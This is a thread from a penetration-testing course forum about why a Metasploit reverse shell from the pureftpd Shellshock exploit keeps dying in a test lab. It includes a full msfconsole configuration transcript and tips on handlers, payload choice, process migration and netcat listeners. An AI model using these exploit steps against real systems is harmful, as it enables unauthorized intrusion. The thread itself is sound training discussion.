shell and meterpreterAdvanced Penetration Testing Course

Begin Learning Cyber Security for FREE Now!

Already a Member Login Here

Home Forums Courses Advanced Penetration Testing Course shell and meterpreter

This topic contains 17 replies, has 6 voices, and was last updated by  omer 1 year, 9 months ago.

Viewing 18 posts - 1 through 18 (of 18 total)
  • Author
  • #33815


    Hello all,

    I have compromised a test setup with MSF. I can open a SHELL but am not able to open a meterpreter, anyone know what I am missing. I launched the exploit by hand, target was vulnerable and is compromised.




    Did you set meterpreter as the payload? If so, what is the error?



    I will copy the error as soon as I am back to work, at home I don’t have acces to the server.



    In geeneral to make this work:
    Make sure to generate a meterpreter payload (ie windows/meterpreter/reverse_tcp for windows)
    Start a listener in msfconsole: exploit/multi/handler
    Set the same payload in the handler as in the exploit.

    Run the handler first, then fire the exploit.

    Good luck.



    Thanks,I forgot to run the handler before the exploit.



    Makes sense…
    Cool that you got it working! 😀



    Now I get this strange error ….. Reason: Died from EOFError ….. H E L P please

    msf exploit(pureftpd_bash_env_exec) > exploit -j
    [*] Exploit running as background job.
    [*] Started bind handler
    msf exploit(pureftpd_bash_env_exec) > sessions

    Active sessions

    Id Type Information Connection
    — —- ———– ———-
    1 shell ->

    msf exploit(pureftpd_bash_env_exec) > sessions -i 1
    [*] Starting interaction with 1…

    [*] – Command shell session 1 closed. Reason: Died from EOFError


    Matt Pardo

    Can you post your Show options output? Redact any Internet-facing IPs, of course.



    I can, I will rerun the procedure.
    The RHOST number above is of course not real, I replaced it because with a fake one.



    use exploit/multi/ftp/pureftpd_bash_env_exec
    msf exploit(pureftpd_bash_env_exec) > set TARGET 1
    TARGET => 1
    msf exploit(pureftpd_bash_env_exec) > set PAYLOAD generic/shell_reverse_tcp
    PAYLOAD => generic/shell_reverse_tcp
    msf exploit(pureftpd_bash_env_exec) > set LHOST
    LHOST =>

    This answer I found myself but it doesn’t help me even a bit:
    EOFError (End of File error), is thrown when you trying to do carry out an operation on a file object that has already referencing to the end of the file. In this example, we are trying to readline when the line doesn’t exist.
    msf exploit(pureftpd_bash_env_exec) > set LPORT 17149
    LPORT => 17149
    msf exploit(pureftpd_bash_env_exec) > set SSLVersion TLS1
    SSLVersion => TLS1
    msf exploit(pureftpd_bash_env_exec) > set RPORT 21
    RPORT => 21
    msf exploit(pureftpd_bash_env_exec) > set SSLVerifyMode PEER
    SSLVerifyMode => PEER
    msf exploit(pureftpd_bash_env_exec) > set VERBOSE 0
    VERBOSE => 0
    msf exploit(pureftpd_bash_env_exec) > set WfsDelay 0
    WfsDelay => 0
    msf exploit(pureftpd_bash_env_exec) > set SSL 0
    SSL => 0
    msf exploit(pureftpd_bash_env_exec) > set ConnectTimeout 10
    ConnectTimeout => 10
    msf exploit(pureftpd_bash_env_exec) > set TCP::send_delay 0
    TCP::send_delay => 0
    msf exploit(pureftpd_bash_env_exec) > set EnableContextEncoding 0
    EnableContextEncoding => 0
    msf exploit(pureftpd_bash_env_exec) > set FTPDEBUG 0
    FTPDEBUG => 0
    msf exploit(pureftpd_bash_env_exec) > set DisablePayloadHandler 0
    DisablePayloadHandler => 0
    msf exploit(pureftpd_bash_env_exec) > set FTPTimeout 16
    FTPTimeout => 16
    msf exploit(pureftpd_bash_env_exec) > set TCP::max_send_size 0
    TCP::max_send_size => 0
    msf exploit(pureftpd_bash_env_exec) > set RHOST
    RHOST =>
    msf exploit(pureftpd_bash_env_exec) > set CMDSTAGER::FLAVOR auto
    msf exploit(pureftpd_bash_env_exec) > set RPATH /bin
    RPATH => /bin
    msf exploit(pureftpd_bash_env_exec) > exploit -j
    [*] Exploit running as background job.
    [*] Started reverse handler on

    • This reply was modified 4 years, 8 months ago by  Zjelko.

    Matt Pardo

    Nothing is obvious from your output. I haven’t seen that error before but that doesn’t mean much. : ) Are you sure the exploit is valid against that host? I would probably just enumerate more and try another attack vector. If there aren’t any then I would probably go through the exploit code and see if I could do it by hand. That way you might be able to see why it is throwing an error and where.



    Thanks for your reponse,

    The exploit is valid against the host, it opens a shell but only for 30 seconds. If I type the command to the list the sessions I can see that a session is open. This wouldn’t be the case if the target wasn’t compromised.
    I haven’t figured it out yet, but I will. I am going for the admin account.

    Thanks agian



    I found that some shells and some exploits don’t really work well together.
    In your output above you use generic/shell_reverse_tcp.

    Maybe give linux/x86/shell_reverse_tcp a try in stead. I’ve been more successful with that one…



    You should upload an exe payload to the server and run it in order to open a more stable reverse shell.
    I get exactly the same problem with Brainspan 1 (on Vulnhub) last week. I’ve found the shell is more stable if I used a non meterpreter reverse shell but a standart one.



    Using an executable to setup a reverse meterpreter shell is not always an option… As an alternative, when using meterpreter you could try to do a migration to another process as well. That also often helps a lot.

    However, looking at the provided options Zjelco is not using Meterpreter, but a standard reverse shell: generic/shell_reverse_tcp.


    Matt Pardo

    Hmm, tough one. I am not sure what set FTPTimeout 16 is but you could play with that. You could tcpdump the entire exploit and see if there is anything obvious in the pcap. Any idea if the ftp server is dying? Have you looked if it has advanced options?



    Hello guys,

    Uploading a file isn’t an option yet. I do agree with the both of you and will try to use another
    maybe more stable reverse_shell. Thanks, and I keep you posted



    couple of years late, but have you tried setting the handler via netcat, worked for me on a similar case and that solved it.

Viewing 18 posts - 1 through 18 (of 18 total)

You must be logged in to reply to this topic.

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?